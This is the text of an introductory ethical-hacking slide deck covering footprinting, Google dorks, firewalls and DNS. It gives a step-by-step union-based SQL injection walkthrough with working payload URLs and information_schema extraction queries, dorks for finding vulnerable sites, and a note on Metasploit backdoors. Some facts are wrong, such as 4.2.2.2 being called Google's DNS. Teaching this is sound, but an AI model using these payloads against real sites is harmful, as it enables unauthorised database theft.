Unlocking the Power of ChatGPT and AI in Testing - A Real-World Look, present...
Security Awareness Programme
1. Introduction to Hacking
Hacking is the art of manipulating things such
that it works the way ; it wasn’t supposed to
do.
So, the term ‘Hacking’ is not only confined to
the world of computers only.
EX : Opening the car window using a ruler
2. Who am I ?
Hacker is a person who loves to explore the
technology and takes it to next level.
According to some stereotypes, Hacking
today refers to breaking in computer system
without authorization, which is a criminal
offense as per law.
The person who uses their hacking skills for
malicious purpose is called cracker .
4. Technical Level of Hackers
Neophyte – A Newbie in the field of
Computer Security with almost no
knowledge.
Script Kiddie – A non-expert who uses
Tools or Scripts made by other Hackers
into System with little knowledge about
the concept working behind the tool.
Elite – Also known as 1337, it is a term
used to describe the most technically
advanced hackers who use cutting edge
technology.
5. IS HACKING LEGAL?
Yes, Hacking is legal, if you are authorized for
the same i.e hired to find Vulnerabilities.
This is the job of an ETHICAL HACKER
Ethical Hacker is a person who uses their
hacking skills for finding security loop holes or
vulnerabilities in hiring TARGET system and
reports the flaws to administrator of the
company.
6. Security Triangle
Defines Balance between Security , Functionality and Ease of use
As security increases, the system’s functionality and ease of use decreases .
11. STEPS OF ETHICAL HACKING
1.
Information
gathering
2. Scanning
3. Gaining
Access
4. Generating
Report
5. Report
vunerability
12. Footprinting
• Process of creating a blueprint or map of an
organization’s network and systems.
• Or It is a technique of gathering information
form various Sources.
• Generally, a hacker spends 90
percent of the time profiling
and gathering information on
a target and 10 percent of the
time launching the attack.
13. Sources of Information
• Media – TV , News etc
• Social Network – facebook, Twitter, Google+
• Search Engine – Google, Yahoo, Bing
• People Search – Yahoo! People, 123people.com
etc.
• Domain name Lookups – Whois, SamSpade,
Nslookup, Domain name lookup, DnsStuff
• Network Range - ARIN, IANA,
• Geographic Map – Traceroute, NeoTrace,
VisualRoute
• “Every single bit of information can useful”
14. Sources of Information
Online Lookups
• Whois , ARIN , Centralops, SamSpade
• DNSstuff, Visual Trace, NeoTrace
Social Network + People Search
• Facebook, Google + , Twitter
• Yahoo! People, 123people
Search Engines, News Groups
• Google news, iGoogle
• Google, Yahoo, Bing, Ask
17. What is firewall?
Firewalls are software program or hardware
devices that works as a filter between your
computer (or network) and internet depending
upon a set of rules.
It is similar to security guard at entrance who
prevents intruders to enter the house
and also prevents convicts from
escaping out.
Firewalls are of two types:
1. Software firewalls 2. Hardware firewalls
18. Software firewalls
• Used by individual home users
• Installed on your computer as an application software.
• Runs in background and monitors the network activity.
• Ex: windows firewall, Black ice defender, kaspersky internet
security, AVG internet security etc.
•
19. • It is a device that guards the entrance to a network, not an
individual computer.
• Basically, installed between your broadband
cable or DSL modem and your computers.
• Provides higher level of security than software firewalls.
Hardware firewall
22. What is DNS?
• DNS stands for Domain Name Server.
• It was difficult to remember ip address for each
websites, so it came into action.
• It maintains table that contains domian names vs ip
address columns in its database.
• Used for translating domain names into their
respective ip address.
• Ex : facebook.com = 66.220.158.11
• Stores frequently used domains in its cache.
• Ex : Google’s open DNS server : 4.2.2.2
24. Google Hacking
Founders of Google:
Sergey Brin and Larry Page
“Google Hacking” doesn’t mean
“How to hack Google? ”.
It is skill to extract valuable
information from web with the
help of special keywords called
“GOOGLE DORKS”
Main idea is to “Pick a vulnerability, find the site”.
25. How Google works?
• Google Bots : Bots are computer program that automatically
browse the world wide web in some order. These are also called
web crawlers, spiders, ants or robots. Google uses mainly two bots :
Crawlers : It traverses over the web following the links found on
different pages. When it finds any new page, sends its link to spider.
Spiders : It is a robotic browser like program that downloads the web
pages associated with the link send by crawlers.
• Indexer : It dissects and sorts each word, images etc on the every
web page downloaded by spiders.
• The Database is a warehouse for storing the pages downloaded and
processed.
• Search Engine Results : Depending upon search keywords, it digs
search results out of the database following an algorithm.
26. Google : Server side
Google bots
Crawler finds new pages via
• URL submission at http://google.com/addurl.html
• Following different links present on each webpage.
Spiders download these webpages on google servers
28. Basics of Google Hacking
+ Forces the word to be searched +firefox , will bring up results that
contains the word firefox.
- Eliminates the word from search results -chrome, will bring up results that
doesn’t contains word chrome
“ ” delimiters for entire search phrases
(not single words)
“Internet Explorer" will return
documents containing the phrase
Internet Explorer
. Single letter wildcard Krazzy.hack will search for words like
krazzy@hack, krazzy2hack, krazzy-
hack, krazzy_hack etc.
* Single word wildcard hack * planet will search for words
like hack the planet, hack for planet,
hack all planet etc.
| logical OR firefox|chrome will return
documents containing either firefox
or chrome but not both.
29. Google query : keywords - I
site Restricts the search within the
specified domain.
site:xyz.com will show all pages on
xyz.com crawled by Google bots
intitle restricts results to documents whose
title contains the specified word
intitle:fox fire will find all sites with
the word fox in the
title and fire in the text
allintitle restricts results to documents whose
title contains all the specified
phrases
allintitle:fox fire will find all sites with
the words fox and fire in the title, so
it's equivalent to intitle:fox intitle:fire
inurl restricts the results to sites whose
URL contains specified word
inurl:hacker will find sites whose url
contain word hacker.
allinurl restricts results to sites whose URL
contains all the specified phrases
allinurl:hacker vs cracker will find the
sites whose url contains hacker vs
cracker
filetype Filters search to specified filetypes filetype:pdf Google hacking will
show all the pdf documents
containing word Google hacking
30. Google query : keywords -II
link restricts results to sites
containing links to the specified
location
link:www.google.com will return
documents containing one or more
links to www.google.com
inanchor restricts results to sites
containing anchored text with
the specified word
inanchor: backtrack will return
documents that has fire as anchored
text (not url)
allintext restricts results to documents
containing the specified phrase
in the text only.
allintext:“kevin Mitnik" will return
documents which contain the phrase
kevin Mitnik in their text only
numrange restricts results to documents
containing a number from the
specified Range
numrange:1-100 fire will return sites
containing a number from 1 to 100 and
the word fire. The same result can be
achieved with 1..100 fire
cache Shows cache version of URL cache:xyz.com will show how the site
looked , the last time Google bots
visited the site.
32. System Hacking
Where windows installs password
Reset windows logon password
Play with sticky keys
OPHCRACK
Make a folder System Hidden
Enable/Disable USB devices
Make Drives invisible
Make a undeletable folder
Trojans
34. Email Hacking
How to Trace sender of email
Check if sender has opened your mail
Get ip address of your friend on chat
Secret Question….
Phishing – Yeah I got A fish ;-)
Keyloggers – what the heck??
35. Phishing
Attacker convinces the victim to put their details on a fake page
When Attacker enters their credentials on the form is stored on another log file
And Victim is redirected to Original site.
45. SQL Injection
• What is Database?
- Collection of logically related data
- It is similar to Attendance register
• Define Table ?
- It combination of rows and columns
• What is SQL ?
- SQL stands for Structured Query Language.
- Used to select the information from database
46. Basic SQL queries
Create a table
• Create table users(name varchar2(30), email varchar(50),
password varchar(30), address varchar2(100));
Extracting data from table
• Select name, email, password from users;
• Select * from users where email=‘xyz@abc.com’ AND
password=‘s3cr3t’;
• Select * from users order by name;
47. Basics of SQL Injection
• How to find a site that is vulnerable to sql
injection attack?
- Use Google dorks
- Inurl:view_faculty.php?id=
- Inurl:viz.php?id=
- Inurl:list.php?id=
- Use Vunerability scanner
- Acutenix
- W3af
48. What happens in background??
• Check if site is vulnerable or not?
- Ex : http://xyz.com/list.php?id=3
Select name, email, password from users where
id =3;
- Ex : http://xyz.com/list.php?id=3’
Select name, email, password from users where
id =3’;
THIS WILL GIVE AN ERROR MESSAGE, MEANS WE
CAN DIRECTLY COMMUICATE WITH DATABASE !!
49. So WHAT’s NEXT???
• We will try to find no of columns in the Table
http://xyz.com/list.php?id=3+order+by+1--
Select name, email, password from users where id =3
order by 1--
- It will extract name, email, passowrd from users table
and sort the contents by 1st column; So it will give you
fresh original webpage.
Select name, email, password from users where id =3
order by 100—
- It will extract name, email, passowrd from users table and
sort the contents by 100th column; There isn’t any 100th
column so it will give you error.
50. Finding columns
• So , we will increment ‘order by value by 1’
untill we get error
http://xyz.com/list.php?id=3+order+by+1--
http://xyz.com/list.php?id=3+order+by+2--
http://xyz.com/list.php?id=3+order+by+3--
:
:
http://xyz.com/list.php?id=3+order+by+7--
The above query returns error , means there are
6 columns current table.
51. Find the Vulnerable column
• We select all the columns i.e from 1-6
http://xyz.com/list.php?id=3+union+all+select+1,2,3,4,5,6--
• Try to find the vulnerable column that will
retuurn data
http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,6--
IT WILL RETURN THE NOS OF VULNERABLE
COLUMN i.e 1,2,3,4,5 or 6.
52. SQLi cont..
• Suppose it returns 2 and 6
http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,6--
• Then we can fetch any information in database at
these column nos
http://xyz.com/list.php?id=-
3+union+all+select+1,@@version,3,4,5,database()--
This will return the version of database and name of database.
SYSTEM VARIABLES
@@version : Returns Version of database
@@user : Returns the user Currently logged in
@@database : Returns the name of database
53. Information Schema
• Most of the websites use Mysql Databases for
storing their information.
• MySQl has ‘INFORMATION_SCHEMA’ database
which keeps record of all the schemas , tables and
Columns in the server.
• INFORMATION_SCHEMA.SCHEMATA stores
shema details.
• INFORMATION_SCHEMA.TABLES stores all the
information regarding tables in the database.
• INFORMATION_SCHEMA.COLUMNS stores
information of all the columns in all the tables.
54. SQLi Cont…
• The below query will extract all the database in
the current server.
http://xyz.com/list.php?id=-
3+union+all+select+1,2,3,4,5,group_concat(schema
_name) from information_schema.schemata—
• Below code will extract all the tables in current
db
http://xyz.com/list.php?id=-
3+union+all+select+1,2,3,4,5,group_conact(table_n
ame) from information_schema.tables—
55. SQLi Cont…
• Extract all the Columns from the current table
http://xyz.com/list.php?id=-
3+union+all+select+1,2,3,4,5,group_conact(colu
mn_name) from information_schema.columns
where table_name=‘users’—
• Extract all the
56. Metasploit Framework
• It is a framework to exploit the services found
during Scanning Phase
• You can create virus infected files .. Using this
framework within a couple of minutes
• After Breaking into the system, You can set
backdoor, download files , upload files, disable
mouse, disable keyboard…and lots more
• We have provided a detailed full length HD
video tutorial in the DVD and a ebook